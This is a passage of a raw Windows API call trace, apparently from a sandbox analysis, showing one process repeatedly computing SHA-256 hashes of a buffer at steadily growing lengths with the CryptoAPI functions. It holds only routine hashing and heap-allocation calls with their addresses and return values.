	[0197.117] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.117] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.117] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0197.117] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690150
	[0197.117] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690150, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690150, pdwDataLen=0x128aac) returned 1
	[0197.117] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.117] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.117] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.118] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.118] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0197.118] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.118] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690178
	[0197.118] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2690178, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690178, pdwDataLen=0x128aac) returned 1
	[0197.118] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.118] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.118] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.118] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.118] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0197.118] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.118] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26901a0
	[0197.118] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26901a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x26901a0, pdwDataLen=0x128aac) returned 1
	[0197.118] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.118] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.118] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.119] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.119] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0197.119] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26901c8
	[0197.119] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x26901c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x26901c8, pdwDataLen=0x128aac) returned 1
	[0197.119] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.119] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.119] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.119] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.119] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0197.119] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26901f0
	[0197.119] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26901f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x26901f0, pdwDataLen=0x128aac) returned 1
	[0197.119] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.119] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.119] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.120] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.120] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0197.120] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.120] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690218
	[0197.120] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2690218, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690218, pdwDataLen=0x128aac) returned 1
	[0197.120] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.120] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.120] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.120] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.120] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0197.120] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.120] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690240
	[0197.120] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690240, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690240, pdwDataLen=0x128aac) returned 1
	[0197.120] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.120] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.120] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.121] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.121] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0197.121] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.121] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690268
	[0197.121] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2690268, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690268, pdwDataLen=0x128aac) returned 1
	[0197.121] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.121] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.121] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.121] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.121] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0197.121] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.121] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690290
	[0197.121] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690290, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690290, pdwDataLen=0x128aac) returned 1
	[0197.121] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.121] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.121] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.122] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.122] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0197.122] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26902b8
	[0197.122] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x26902b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x26902b8, pdwDataLen=0x128aac) returned 1
	[0197.122] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.122] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.122] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.122] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.122] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0197.122] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26902e0
	[0197.123] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26902e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x26902e0, pdwDataLen=0x128aac) returned 1
	[0197.123] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.123] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.123] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.123] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.123] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0197.123] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690308
	[0197.123] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2690308, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690308, pdwDataLen=0x128aac) returned 1
	[0197.123] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.123] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.123] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.123] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.123] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0197.124] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690330
	[0197.124] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690330, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690330, pdwDataLen=0x128aac) returned 1
	[0197.124] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.124] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.124] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.124] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.124] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0197.124] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690358
	[0197.124] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2690358, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690358, pdwDataLen=0x128aac) returned 1
	[0197.124] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.124] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.124] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.124] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.124] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0197.125] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690380
	[0197.125] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690380, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690380, pdwDataLen=0x128aac) returned 1
	[0197.125] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.125] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.125] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.125] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.125] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0197.125] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26903a8
	[0197.125] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x26903a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x26903a8, pdwDataLen=0x128aac) returned 1
	[0197.125] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.125] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.125] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.126] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.126] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0197.126] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26903d0
	[0197.126] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26903d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x26903d0, pdwDataLen=0x128aac) returned 1
	[0197.126] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.126] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.126] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.126] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.126] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0197.126] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26903f8
	[0197.126] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x26903f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x26903f8, pdwDataLen=0x128aac) returned 1
	[0197.126] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.126] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.126] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.127] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.127] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0197.127] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690420
	[0197.127] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690420, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690420, pdwDataLen=0x128aac) returned 1
	[0197.127] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.127] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.127] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.127] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.127] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0197.127] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690448
	[0197.127] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2690448, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690448, pdwDataLen=0x128aac) returned 1
	[0197.127] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.127] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.127] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.128] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.128] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0197.128] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690470
	[0197.128] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690470, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690470, pdwDataLen=0x128aac) returned 1
	[0197.128] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.128] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.128] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.128] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.128] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0197.128] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690498
	[0197.128] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2690498, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690498, pdwDataLen=0x128aac) returned 1
	[0197.128] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.128] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.128] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.129] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.129] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0197.129] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.129] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26904c0
	[0197.129] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26904c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x26904c0, pdwDataLen=0x128aac) returned 1
	[0197.129] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.129] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.129] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.129] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.129] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0197.129] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.129] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26904e8
	[0197.129] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x26904e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x26904e8, pdwDataLen=0x128aac) returned 1
	[0197.129] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.129] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.129] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.130] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.130] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0197.130] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.130] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690510
	[0197.130] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690510, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690510, pdwDataLen=0x128aac) returned 1
	[0197.130] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.130] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.130] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.130] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.130] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xec0, dwFlags=0x0) returned 1
